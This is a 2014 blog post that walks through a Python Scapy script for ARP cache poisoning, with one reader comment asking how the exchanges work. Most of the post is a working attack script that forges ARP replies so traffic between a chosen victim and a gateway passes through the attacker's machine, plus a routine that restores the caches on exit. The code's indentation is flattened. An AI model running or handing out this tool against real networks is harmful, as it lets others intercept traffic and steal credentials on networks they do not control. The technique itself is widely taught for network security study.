Tuesday 22 April 2014

ARP Cache Poison with Scapy

This tool was definitely one of the more fun tools to create. Figuring out how to construct the packets and seeing the arp-cache tables change on the victims was really cool. Added some extra ninja by adding a signal handler to restore the victims arp cache when the user quits by pressing ctrl-c.


from scapy.all import *
import sys
import netifaces as nif
import netifaces
import signal

#This needs to run as root.
#Usage: arp_poison <victim-ip> <target-ip> <interface>

def arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC):
#Send the packet to the victims mac. The source of the MAC is the GW address. In the ARP field the MAC of the GW IP address is our MAC.
#additionaly we set the op to an "is-at" packet
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = targetIP)

#Now we want the GW to think we are the victim.
#Send the packet to GW/TARGET the source is from the Victim. We say the MAC of the Victim is our MAC
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = victimIP)

print "\nForwarding target: %s to  MAC %s"%(targetIP, localMAC)
print "Forwarding target: %s to MAC %s"%(victimIP, localMAC)

while running:
sendp(victimARP, verbose = 0, inter = 1)
sendp(targetARP, verbose = 0, inter = 1)
signal.signal(signal.SIGINT, ctrlc_handler)

def arpRestore(victimIP, targetIP, victimMAC, targetMAC):
#Reset the arp cache for added Ninja
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = targetMAC, psrc = targetIP)
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = victimMAC, psrc = victimIP)
print "\nRestoring arp caches..."

for i in range(1, 10):
sendp(victimARP, inter = 0.5)
sendp(targetARP, verbose = 0, inter = 0.5)
print "Exiting..."

def ctrlc_handler(signum, frm):
#Kill the arpPoison and call the arpRestore function
running = False
arpRestore(victimIP, targetIP, victimMAC, targetMAC)

###########Program Start!################
victimIP = sys.argv[1]
targetIP = sys.argv[2]
interface = sys.argv[3]

victimMAC = getmacbyip(victimIP)
targetMAC = getmacbyip(targetIP)

addrs = netifaces.ifaddresses(interface)
localMAC = addrs[nif.AF_LINK][0]["addr"]
print "\nUsage: arp_poison <victim-ip> <target-ip> <interface>\n"

running = True
arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC)


Victims before and after arp-cache:

1 comment:

  1. Hello,

    I loved your script. I am working with scapy recently and I would like to have an idea about what frames are exchanged and how the script could spread wrong informations in the network.
    Would you please tell me the scinario of the exchanges.

    Thanks a lot
